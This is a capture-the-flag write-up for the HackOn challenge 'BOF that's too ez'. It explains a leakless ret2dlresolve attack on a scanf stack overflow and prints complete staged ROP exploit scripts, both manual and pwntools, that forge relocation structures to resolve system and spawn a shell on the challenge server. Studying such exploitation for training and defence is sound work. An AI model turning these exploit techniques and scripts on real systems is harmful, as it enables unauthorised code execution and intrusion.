BOF that's too ez
We are given a 64-bit binary called chall_patched:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
We also have the Glibc library and loader. We are dealing with version 2.36:
$ ./ld-linux-x86-64.so.2 ./libc.so.6
GNU C Library (Debian GLIBC 2.36-9) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
<http://www.debian.org/Bugs/>.
Source code analysis
This time we also have the source code. And, to be honest, there is not much to say about it:
// gcc main.c -fno-stack-protector -fno-pic -no-pie -o chall
#include <stdio.h>
__attribute__( ( constructor ) ) void init() {
setvbuf( stdin, NULL, _IONBF, NULL );
setvbuf( stdout, NULL, _IONBF, NULL );
setvbuf( stderr, NULL, _IONBF, NULL );
}
int main( void ) {
char buf[0x10] = { 0 };
scanf( "%s", buf );
return 0;
}
So, we have a clear Buffer Overflow vulnerability: the buffer buf has only 16 bytes reserved, but scanf("%s", buf) does not check bounds and keeps writing until it finds a whitespace character (space, tab, newline and the like). Null bytes do not stop it, which will be handy later.
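As a small sketch of the two constraints that follow from this (the helper names bad_bytes and p64 are mine, not part of the challenge): the return address sits 0x10 + 8 bytes after the start of buf, since there is no canary, and no byte of the payload may be a whitespace character.

```python
import struct

# Bytes that end a scanf("%s") read (C isspace() in the default locale).
SCANF_WHITESPACE = b" \t\n\v\f\r"

BUF_SIZE = 0x10       # char buf[0x10] in main
SAVED_RBP_SIZE = 8    # the saved frame pointer follows buf directly (no canary)
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE


def p64(value):
    """Pack a 64-bit little-endian integer (stand-in for the pwntools p64)."""
    return struct.pack("<Q", value)


def bad_bytes(payload):
    """Return the offsets of bytes that would truncate a scanf("%s") read."""
    return [i for i, b in enumerate(payload) if b in SCANF_WHITESPACE]


print(RET_OFFSET)                                    # 24
print(bad_bytes(b"AAAA BBBB\n"))                     # [4, 9]
print(bad_bytes(b"A" * RET_OFFSET + p64(0x40113d)))  # []
```

Running a check like this on every stage before sending it saves some debugging time, because a truncated payload fails silently.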
Exploitation
So, Buffer Overflow. Easy, right? Not quite, because we have plenty of limitations. For instance, we would like to use Return-Oriented Programming (ROP) because NX doesn’t allow us to execute shellcode on the stack. However, we have only a few usable ROP gadgets:
$ ROPgadget --binary chall_patched
Gadgets information
============================================================
0x00000000004010cb : add bh, bh ; loopne 0x401135 ; nop ; ret
0x000000000040109c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401035 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401020
0x00000000004011ee : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x00000000004011ef : add byte ptr [rax], al ; add cl, cl ; ret
0x000000000040113a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040109e : add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401037 : add byte ptr [rax], al ; jmp 0x401020
0x00000000004011f0 : add byte ptr [rax], al ; leave ; ret
0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x000000000040113b : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011f1 : add cl, cl ; ret
0x00000000004010ca : add dil, dil ; loopne 0x401135 ; nop ; ret
0x0000000000401045 : add dword ptr [rax], eax ; add byte ptr [rax], al ; jmp 0x401020
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401137 : add eax, 0x2f0b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401017 : add esp, 8 ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x00000000004010c8 : and byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401135 ; nop ; ret
0x00000000004011b7 : call qword ptr [rax + 0xff3c35d]
0x0000000000401014 : call rax
0x0000000000401153 : cli ; jmp 0x4010e0
0x0000000000401033 : cli ; push 0 ; jmp 0x401020
0x0000000000401043 : cli ; push 1 ; jmp 0x401020
0x00000000004010a3 : cli ; ret
0x00000000004011f7 : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401150 : endbr64 ; jmp 0x4010e0
0x0000000000401030 : endbr64 ; push 0 ; jmp 0x401020
0x0000000000401040 : endbr64 ; push 1 ; jmp 0x401020
0x00000000004010a0 : endbr64 ; ret
0x0000000000401012 : je 0x401016 ; call rax
0x00000000004010c5 : je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401107 : je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x0000000000401039 : jmp 0x401020
0x0000000000401154 : jmp 0x4010e0
0x000000000040103d : jmp qword ptr [rsi - 0x70]
0x00000000004010cc : jmp rax
0x00000000004011f2 : leave ; ret
0x00000000004010cd : loopne 0x401135 ; nop ; ret
0x0000000000401136 : mov byte ptr [rip + 0x2f0b], 1 ; pop rbp ; ret
0x00000000004011ed : mov eax, 0 ; leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x00000000004011b8 : nop ; pop rbp ; ret
0x00000000004010cf : nop ; ret
0x000000000040114c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010e0
0x00000000004010c6 : or dword ptr [rdi + 0x404020], edi ; jmp rax
0x0000000000401138 : or ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040113d : pop rbp ; ret
0x0000000000401034 : push 0 ; jmp 0x401020
0x0000000000401044 : push 1 ; jmp 0x401020
0x000000000040101a : ret
0x0000000000401161 : retf
0x0000000000401022 : retf 0x2f
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000040100b : shr dword ptr [rdi], 1 ; add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x00000000004011f9 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004011f8 : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x00000000004010c3 : test eax, eax ; je 0x4010d0 ; mov edi, 0x404020 ; jmp rax
0x0000000000401105 : test eax, eax ; je 0x401110 ; mov edi, 0x404020 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax
Unique gadgets found: 61
ROP gadgets
I’ll highlight those that can be useful:
0x000000000040113c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401039 : jmp 0x401020
0x00000000004011f2 : leave ; ret
0x00000000004010c7 : mov edi, 0x404020 ; jmp rax
0x000000000040113d : pop rbp ; ret
0x000000000040101a : ret
See? We don’t have the classic pop rdi; ret gadget. We can’t even control the content of $rdi: we are forced to use 0x404020!
Also notice that we can only set arbitrary values in $rbp. Well, we can also control $rsp because the leave instruction is just mov rsp, rbp; pop rbp.
Hence, the first gadget could be really useful if we could control $rbx, because we would get a kind of write-what-where primitive. But it looks hard to control $rbx.
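To make the $rsp control through leave; ret concrete, here is a toy emulation of that gadget. The register dictionary, the memory dictionary and the initial $rsp value are made up for illustration; only the semantics of leave (mov rsp, rbp; pop rbp) and ret come from the text above.

```python
def leave_ret(regs, mem):
    """Emulate `leave ; ret` on a toy machine (mem maps addresses to qwords)."""
    regs["rsp"] = regs["rbp"]        # leave, part 1: mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]   # leave, part 2: pop rbp
    regs["rsp"] += 8
    regs["rip"] = mem[regs["rsp"]]   # ret: pop the next qword into rip
    regs["rsp"] += 8
    return regs


# Hypothetical fake frame stored in writable memory at 0x404050.
mem = {0x404050: 0x0, 0x404058: 0x40113d}
regs = {"rbp": 0x404050, "rsp": 0x7ffc00000000, "rip": 0x4011f2}

leave_ret(regs, mem)
print(hex(regs["rsp"]), hex(regs["rbp"]), hex(regs["rip"]))
# 0x404060 0x0 0x40113d
```

Whoever controls $rbp before a leave; ret decides where the stack continues: the qword at $rbp becomes the new $rbp and the qword at $rbp + 8 becomes the next return address.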
Looking at the assembly code, I found some other instructions that can be really handy:
00000000004011bb <main>:
4011bb: f3 0f 1e fa endbr64
...
4011d7: 48 8d 45 f0 lea rax,[rbp-0x10]
4011db: 48 89 c6 mov rsi,rax
4011de: bf 04 20 40 00 mov edi,0x402004
4011e3: b8 00 00 00 00 mov eax,0x0
4011e8: e8 73 fe ff ff call 401060 <_init+0x60>
4011ed: b8 00 00 00 00 mov eax,0x0
4011f2: c9 leave
4011f3: c3 ret
With this section of main, we can control $rax, and therefore $rsi, through $rbp before calling scanf. Notice that $rax = 0 afterwards, so we don’t end up with $rax control. Also, while debugging, it looks like scanf leaves a value in $rsi that we can’t control properly, so it is useless as well.
But the relevant thing is that we can control where to write with scanf! That is, we write to the address $rbp - 0x10. But be careful, because the leave; ret at the end of main will cause a Stack Pivot to wherever $rbp points!
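The relation between the value we put in $rbp, the address scanf writes to and the slots consumed by the following leave; ret can be sketched as below. The function name plan_write and the dictionary keys are hypothetical; the 0x10 offset comes from lea rax, [rbp-0x10].

```python
BUF_OFFSET = 0x10  # main passes rbp - 0x10 to scanf as the destination


def plan_write(target):
    """Given the address we want scanf to write to, derive the rbp to set
    and the two slots that the leave; ret at the end of main will consume."""
    rbp = target + BUF_OFFSET
    return {
        "rbp": rbp,               # value to load with pop rbp ; ret
        "next_rbp_slot": rbp,     # leave pops the new rbp from here
        "return_slot": rbp + 8,   # ret pops the next address from here
    }


plan = plan_write(0x404040)
print({name: hex(addr) for name, addr in plan.items()})
# {'rbp': '0x404050', 'next_rbp_slot': '0x404050', 'return_slot': '0x404058'}
```

So every write made this way must carry, at offsets 0x10 and 0x18 of the data, a sane next $rbp and the address where execution continues.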
The init function also contains useful instructions:
0000000000401156 <init>:
401156: f3 0f 1e fa endbr64
...
40119a: 48 8b 05 9f 2e 00 00 mov rax,QWORD PTR [rip+0x2e9f] # 404040 <stderr@GLIBC_2.2.5>
4011a1: b9 00 00 00 00 mov ecx,0x0
4011a6: ba 02 00 00 00 mov edx,0x2
4011ab: be 00 00 00 00 mov esi,0x0
4011b0: 48 89 c7 mov rdi,rax
4011b3: e8 98 fe ff ff call 401050 <_init+0x50>
...
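This part corresponds to setvbuf(stderr, NULL, _IONBF, NULL). We can also find the equivalent with stdin (0x404030) and stdout (0x404020). Notice that $rdi is loaded from memory here, so it receives the pointer stored at 0x404040, 0x404030 or 0x404020, depending on where we jump. Therefore, if we overwrite one of those pointers, we choose the value of $rdi.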
Last but not least, these sections will be highly relevant for the exploit I came up with:
0000000000401020 <.plt>:
401020: ff 35 ca 2f 00 00 push QWORD PTR [rip+0x2fca] # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: ff 25 cc 2f 00 00 jmp QWORD PTR [rip+0x2fcc] # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
40102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
401030: f3 0f 1e fa endbr64
401034: 68 00 00 00 00 push 0x0
401039: e9 e2 ff ff ff jmp 401020 <_init+0x20>
40103e: 66 90 xchg ax,ax
401040: f3 0f 1e fa endbr64
401044: 68 01 00 00 00 push 0x1
401049: e9 d2 ff ff ff jmp 401020 <_init+0x20>
40104e: 66 90 xchg ax,ax
Disassembly of section .plt.sec:
0000000000401050 <.plt.sec>:
401050: f3 0f 1e fa endbr64
401054: ff 25 a6 2f 00 00 jmp QWORD PTR [rip+0x2fa6] # 404000 <setvbuf@GLIBC_2.2.5>
40105a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
401060: f3 0f 1e fa endbr64
401064: ff 25 9e 2f 00 00 jmp QWORD PTR [rip+0x2f9e] # 404008 <__isoc99_scanf@GLIBC_2.7>
40106a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
Also, notice that the only functions we can use are setvbuf and scanf. There is no function that prints information to stdout! Therefore, we must come up with a leakless exploit!
ret2dlresolve
Whenever there are few useful gadgets and we don’t see a way to leak memory addresses to bypass ASLR, we can rely on ret2dlresolve.
This technique abuses how dynamically-linked programs resolve external function addresses at runtime. With it, we can tell the program to resolve the address of system, so we don’t have to care about ASLR.
There are not many resources out there that explain this attack in depth, especially for the x86_64 architecture. I’ll link some of them here:
- ret2dl_resolve x64: Exploiting Dynamic Linking Procedure In x64 ELF Binaries
- ROP之return to dl-resolve (in Chinese)
- Boosting your ROP skills with SROP and ret2dlresolve - Giulia Martino - HackTricks Track 2023
- Temple Of Pwn 12 - Ret2DlResolve
In brief, we need to fake some structures and craft offsets and indices so that the _dl_runtime_resolve routine is able to find the function name, resolve the expected function in Glibc and write its real address where we want.
Source: https://syst3mfailure.io/ret2dl_resolve/
The above image perfectly shows the process of calling an external function (read, in that example):
- The main function calls read at the .plt section
- The .plt section jumps directly to the .got.plt section
- If the function is not resolved yet, the .got.plt holds an address back to the .plt
- The program pushes the reloc_arg number and jumps to the default .plt stub
- This stub pushes the link_map address and calls _dl_runtime_resolve
In this process, we can mess around with the reloc_arg number, because it is passed to _dl_runtime_resolve on the stack. We need to learn how the linker uses it in order to come up with a successful ret2dlresolve exploit.
There are three relevant sections used by the linker to resolve addresses:
- JMPREL (.rela.plt) is a table of Elf64_Rel structures (strictly speaking, Elf64_Rela on x86_64, size 0x18). Each structure contains r_offset, r_info and r_addend, which we can treat as padding. The first two attributes are the relevant ones, because r_offset holds the address where the resolved address will be written to, and r_info is used to locate the corresponding Elf64_Sym structure in DYNSYM.
- DYNSYM (.dynsym) contains a table of Elf64_Sym structures (size 0x18). The relevant field of this structure is st_name, which contains the offset of the symbol name inside STRTAB.
- STRTAB (.dynstr) is just a list of symbol names all together, each one terminated by a null byte.
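The lookup chain described by these three sections can be sketched with a toy model. This is a heavy simplification of what the dynamic linker does (it ignores symbol versioning and every other check), and all addresses in the toy layout are made up; the function name resolve is mine.

```python
import struct

ENTRY_SIZE = 0x18          # size of both relocation and symbol entries
R_X86_64_JUMP_SLOT = 7     # relocation type expected for PLT entries


def resolve(mem, base, jmprel, symtab, strtab, reloc_arg):
    """Follow reloc_arg -> relocation -> symbol -> name in a toy memory image."""
    def read(addr, size):
        return bytes(mem[addr - base:addr - base + size])

    r_offset, r_info, _r_addend = struct.unpack(
        "<QQq", read(jmprel + reloc_arg * ENTRY_SIZE, ENTRY_SIZE))
    assert r_info & 0xffffffff == R_X86_64_JUMP_SLOT
    sym_index = r_info >> 32                       # upper 32 bits of r_info
    (st_name,) = struct.unpack("<I", read(symtab + sym_index * ENTRY_SIZE, 4))
    start = strtab + st_name - base
    name = bytes(mem[start:mem.index(b"\0", start)]).decode()
    return name, r_offset                          # what to resolve, where to write it


# Toy layout: relocation #1 points to symbol #2, whose name is at offset 5.
BASE, JMPREL, SYMTAB, STRTAB = 0x1000, 0x1000, 0x1060, 0x10c0
mem = bytearray(0x200)
struct.pack_into("<QQq", mem, JMPREL - BASE + 1 * ENTRY_SIZE,
                 0x2000, (2 << 32) | R_X86_64_JUMP_SLOT, 0)
struct.pack_into("<IBBHQQ", mem, SYMTAB - BASE + 2 * ENTRY_SIZE, 5, 0, 0, 0, 0, 0)
names = b"\0abc\0system\0"
mem[STRTAB - BASE:STRTAB - BASE + len(names)] = names

print(resolve(mem, BASE, JMPREL, SYMTAB, STRTAB, reloc_arg=1))
# ('system', 8192)
```

Nothing in this chain checks that the indices stay inside the real tables, which is exactly what lets a large reloc_arg point to structures we wrote ourselves.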
Implementation
Let’s jump directly into the ret2dlresolve exploit code:
from pwn import p8, p16, p32, p64 # packing helpers used below
align = lambda alignment, addr: addr + (- addr % alignment)
JMPREL = 0x4005e0 # .rela.plt section
SYMTAB = 0x3fe450 # .dynsym section
STRTAB = 0x3fe510 # .dynstr section
dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'
fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18
st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0
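# Elf64_Sym field order: st_name (4), st_info (1), st_other (1), st_shndx (2), st_value (8), st_size (8)
elf64_sym = p32(st_name) + p8(st_info) + p8(st_other) + p16(st_shndx) + p64(st_value) + p64(st_size)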
index = align(0x18, fake_symtab - SYMTAB) // 0x18
r_offset = setvbuf_got_addr # 0x404000, defined with the other addresses further down
r_info = (index << 32) | 7 # 7 = R_X86_64_JUMP_SLOT
elf64_rel = p64(r_offset) + p64(r_info) + p64(0)
reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18
dlresolve_payload = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel
First of all, I define the align function to round a distance up to a multiple of 0x18, the size of the structures. Then I define the relevant sections according to the binary:
$ readelf --sections chall_patched | egrep "Name|.rela.plt|.dynsym|.dynstr"
[Nr] Name Type Address Offset
[ 6] .dynsym DYNSYM 00000000003fe450 00000450
[ 7] .dynstr STRTAB 00000000003fe510 00000510
[12] .rela.plt RELA 00000000004005e0 000025e0
After that, I choose the address where I will store the payload and the symbol I want to resolve:
dlresolve_payload_addr = 0x404e00
symbol_name = b'system\0'
With this, I can start crafting fake structures. But let’s go to the end for a second:
dlresolve_payload = symbol_name.ljust(0x10, b'\0')
dlresolve_payload += elf64_sym
dlresolve_payload += elf64_rel
In short, the dlresolve_payload is just a fake STRTAB, a fake DYNSYM and a fake JMPREL. This payload will be located at dlresolve_payload_addr = 0x404e00 (in the .bss section, which is writable):
fake_strtab = dlresolve_payload_addr
fake_symtab = dlresolve_payload_addr + 0x10
fake_jmprel = dlresolve_payload_addr + 0x10 + 0x18
Now, we need to find a value for reloc_arg and the attributes of the fake structures.
First of all, the fake SYMTAB section, which contains an Elf64_Sym structure:
st_name = fake_strtab - STRTAB
st_value = 0
st_size = 0
st_info = 0
st_other = 0
st_shndx = 0
elf64_sym = p32(st_name) + p8(st_info) + p8(st_other) + p16(st_shndx) + p64(st_value) + p64(st_size)
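For reference, the Elf64_Sym layout can also be written with the standard struct module. This is only a sketch: pack_sym is a hypothetical helper, and the two addresses are the ones used in this write-up.

```python
import struct

# Elf64_Sym field order: st_name (u32), st_info (u8), st_other (u8),
# st_shndx (u16), st_value (u64), st_size (u64) -> 0x18 bytes in total.
ELF64_SYM = struct.Struct("<IBBHQQ")


def pack_sym(st_name, st_info=0, st_other=0, st_shndx=0, st_value=0, st_size=0):
    """Serialize one Elf64_Sym entry in little-endian byte order."""
    return ELF64_SYM.pack(st_name, st_info, st_other, st_shndx, st_value, st_size)


STRTAB = 0x3fe510        # .dynstr address from the readelf output
fake_strtab = 0x404e00   # where the "system" string is stored

sym = pack_sym(fake_strtab - STRTAB)
print(hex(ELF64_SYM.size))   # 0x18
print(sym[:4].hex())         # f0680000
```

Since every field except st_name is zero here, the order of the remaining fields does not change the bytes, but it matters as soon as any of them is non-zero.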
The index of this fake entry is computed as the distance between the legitimate and fake SYMTAB sections, in units of 0x18 bytes:
index = align(0x18, fake_symtab - SYMTAB) // 0x18
This index goes into the upper 32 bits of the r_info attribute of the fake Elf64_Rel structure, at the fake JMPREL section:
r_offset = setvbuf_got_addr
r_info = (index << 32) | 7
elf64_rel = p64(r_offset) + p64(r_info) + p64(0)
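The encoding of r_info mirrors the ELF64_R_SYM and ELF64_R_TYPE macros. A minimal sketch follows; the function names are mine, and 1128 is the symbol index that results from the addresses used in this write-up.

```python
R_X86_64_JUMP_SLOT = 7  # relocation type of .rela.plt entries on x86_64


def make_r_info(sym_index, rel_type=R_X86_64_JUMP_SLOT):
    """Symbol index in the upper 32 bits, relocation type in the lower 32."""
    return (sym_index << 32) | rel_type


def r_sym(r_info):
    """Equivalent of ELF64_R_SYM: recover the symbol index."""
    return r_info >> 32


def r_type(r_info):
    """Equivalent of ELF64_R_TYPE: recover the relocation type."""
    return r_info & 0xffffffff


r_info = make_r_info(1128)
print(hex(r_info), r_sym(r_info), r_type(r_info))
# 0x46800000007 1128 7
```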
Finally, the reloc_arg number is computed as the distance between the legitimate and fake JMPREL sections, again in units of 0x18 bytes:
reloc_arg = align(0x18, fake_jmprel - JMPREL) // 0x18
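Both indices only work if the fake structures sit at an exact multiple of 0x18 from the start of the real tables. With the addresses chosen here that is the case, which the following sketch verifies. Unlike align, the hypothetical helper table_index refuses to round, because as far as I can tell a rounded-up index would point past the fake structure.

```python
ENTRY_SIZE = 0x18


def table_index(table_base, fake_entry_addr):
    """Index that makes table_base + index * 0x18 land exactly on the fake entry."""
    distance = fake_entry_addr - table_base
    if distance % ENTRY_SIZE:
        raise ValueError(f"{hex(fake_entry_addr)} is not 0x18-aligned from {hex(table_base)}")
    return distance // ENTRY_SIZE


JMPREL, SYMTAB = 0x4005e0, 0x3fe450   # from the readelf output
payload_addr = 0x404e00
fake_symtab = payload_addr + 0x10
fake_jmprel = payload_addr + 0x10 + 0x18

index = table_index(SYMTAB, fake_symtab)
reloc_arg = table_index(JMPREL, fake_jmprel)
print(index, reloc_arg)   # 1128 771
```

If another payload address is chosen, the fake structures may need a few bytes of extra padding so that both distances stay multiples of 0x18.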
Did you notice that r_offset is set to the address of setvbuf at the GOT? Yes, we want the address of system to be written there. Then, we can jump to the instructions we saw earlier in the init function, which load $rdi from 0x404020, 0x404030 or 0x404040 and call setvbuf (system, by then). Therefore, we will need to store a pointer to "/bin/sh\0" at one of these addresses.
Let’s write here some ROP gadget addresses and other addresses required for the exploit:
pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2
jmp_plt_addr = 0x401039
setvbuf_got_addr = 0x404000
stderr_got_addr = 0x404040
bin_sh_addr = 0x404048
call_setvbuf_addr = 0x40119a
I don’t know how to explain this better than showing the code:
io = get_process()
stage1 = p64(pop_rbp_ret_addr)
stage1 += p64(stderr_got_addr + 0x10)
stage1 += p64(context.binary.sym.main + 28)
io.sendline(b'A' * 24 + stage1)
In this stage, we set the value of $rbp to the address of stderr (0x404040) plus 0x10. We do this because $rax will have the value of $rbp - 0x10 after the instruction at *main+28 (lea rax, [rbp-0x10]). Hence, the next scanf will write at the address of stderr (0x404040).
stage2 = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve_payload_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)
io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)
First of all, we reuse the 24 bytes of junk needed to reach the return address to store the string "/bin/sh\0" and, right before it, its address. We need this for the end, because setvbuf will be called on the address pointed to by stderr (that is, $rdi will not be 0x404040, but the value stored there, which is 0x404048 at this point).
The second stage will execute from here because at the end of main there is a leave; ret, so we are effectively performing a Stack Pivot. This means that $rsp now points to the .bss, specifically, to 0x404058. Now we do the same trick of setting $rbp to be able to write at a desired address with scanf.
We will start writing just before dlresolve_payload_addr because we need the stack to be safe when doing the ret2dlresolve stuff. We are doing another leave; ret to rebase $rsp to the current value of $rbp (which is 0x70 bytes before dlresolve_payload_addr). This is the reason for the 0xd20-byte padding:
$ python3 -q
>>> hex((0x404e00 - 0x80 + 0x10) - (0x404040 + 0x30))
'0xd20'
After the padding, we enter again the address dlresolve_payload_addr - 0x80 + 0x10 (which the leave; ret gadget pops into $rbp) and then the address of main+28 to call scanf controlling $rax and $rsi. The program flow will jump here again, so we will be able to write our third stage at dlresolve_payload_addr - 0x80:
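To double-check the layout of this second write, the following sketch rebuilds it with the standard struct module and derives the padding from the addresses instead of hard-coding it. The variable names are mine; the addresses are the ones used in this write-up.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian integer (stand-in for the pwntools p64)."""
    return struct.pack("<Q", value)


WRITE_BASE = 0x404040              # scanf destination set up by stage 1
PIVOT = 0x404e00 - 0x80 + 0x10     # 0x404d90, the next fake frame
MAIN_SCANF = 0x4011bb + 28         # lea rax, [rbp-0x10] inside main

head = p64(0x404048) + b"/bin/sh\0" + p64(0)               # pointer, string, next rbp
chain = p64(0x40113d) + p64(PIVOT) + p64(0x4011f2)         # pop rbp; PIVOT; leave; ret
padding = b"\0" * (PIVOT - (WRITE_BASE + len(head) + len(chain)))
frame = p64(PIVOT) + p64(MAIN_SCANF)                       # consumed by leave; ret
payload = head + chain + padding + frame

frame_addr = WRITE_BASE + len(head) + len(chain) + len(padding)
print(hex(len(padding)), hex(frame_addr))   # 0xd20 0x404d90
print(any(b in b" \t\n\v\f\r" for b in payload))   # False
```

The last line confirms that no byte of the payload is a whitespace character, so scanf reads it in one go.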
stage3 = p64(jmp_plt_addr)
stage3 += p64(reloc_arg)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve_payload
io.sendline(b'A' * 24 + stage3)
This last stage will write 0x18 bytes of Buffer Overflow junk and then the address of a jmp 0x401020 instruction. We cannot use 0x401020 directly because the byte 0x20 is an ASCII space, and scanf would stop reading. Then comes the reloc_arg for the ret2dlresolve exploit, which the resolver expects on the stack. After that, we enter the address of the instructions that load $rdi from 0x404040 and call setvbuf (this will run after the relocation process, when setvbuf already resolves to system).
Finally, we add some more padding to fill 0x80 bytes (0x18 + 0x18 + 0x50) and write dlresolve_payload.
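The same kind of arithmetic check can be done for this third write. It is a sketch with my own variable names, where reloc_arg = 771 is the value that results from the addresses used above; it verifies that the fake structures land exactly at 0x404e00 and shows why the address 0x401020 is rejected.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian integer (stand-in for the pwntools p64)."""
    return struct.pack("<Q", value)


payload_addr = 0x404e00
write_base = payload_addr - 0x80   # scanf destination: rbp - 0x10 with rbp = 0x404d90
reloc_arg = 771                    # (fake_jmprel - JMPREL) // 0x18

junk = b"A" * 0x18                                        # buffer + saved rbp slot
chain = p64(0x401039) + p64(reloc_arg) + p64(0x40119a)    # jmp 0x401020; reloc_arg; init code
padding = b"\0" * 0x50

print(hex(write_base + len(junk)))                               # 0x404d98
print(hex(write_base + len(junk) + len(chain) + len(padding)))   # 0x404e00
print(0x20 in p64(0x401020), 0x20 in p64(0x401039))              # True False
```

The first printed address is the return slot used by the leave; ret at the end of main, so execution continues at the jmp 0x401020 instruction with reloc_arg on top of the stack.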
With all this, we will get a shell, both locally and on the local Docker container:
$ python3 solve_manual.py
[*] './chall_patched'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[+] Starting local process './chall_patched': pid 3272010
[*] Switching to interactive mode
$ whoami
rocky
Using pwntools
If you noticed, the script is called solve_manual.py. That’s because I wrote another exploit called solve_pwntools.py that abstracts all the ret2dlresolve stuff. Here it is:
pop_rbp_ret_addr = 0x40113d
leave_ret_addr = 0x4011f2
bin_sh_addr = 0x404048
jmp_plt_addr = 0x401039
call_setvbuf_addr = 0x40119a
dlresolve = Ret2dlresolvePayload(
context.binary,
symbol='system',
args=[],
resolution_addr=context.binary.got.setvbuf,
)
io = get_process()
stage1 = p64(pop_rbp_ret_addr)
stage1 += p64(context.binary.got.stderr + 0x10)
stage1 += p64(context.binary.sym.main + 28)
io.sendline(b'A' * 24 + stage1)
stage2 = p64(pop_rbp_ret_addr)
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(leave_ret_addr)
stage2 += b'\0' * 0xd20
stage2 += p64(dlresolve.data_addr - 0x80 + 0x10)
stage2 += p64(context.binary.sym.main + 28)
io.sendline(p64(bin_sh_addr) + b'/bin/sh\0' + b'\0' * 8 + stage2)
stage3 = p64(jmp_plt_addr)
stage3 += p64(dlresolve.reloc_index)
stage3 += p64(call_setvbuf_addr)
stage3 += b'\0' * 0x50
stage3 += dlresolve.payload
io.sendline(b'A' * 24 + stage3)
io.interactive()
Obviously, it is not as exciting as solve_manual.py, but it does look more friendly.
Flag
With either of the exploits, we can get a shell on the remote instance and capture the flag:
$ python3 solve_manual.py 0.cloud.chals.io 26418
[*] './chall_patched'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
RUNPATH: b'.'
SHSTK: Enabled
IBT: Enabled
Stripped: No
[+] Opening connection to 0.cloud.chals.io on port 26418: Done
[*] Switching to interactive mode
$ cat /flag*
HackOn{th4t_w4s_4_fr33_BOF_4_y0u_6c6415857decc41b8d9366be69ab68cc}
The full exploits can be found here: solve_manual.py and solve_pwntools.py.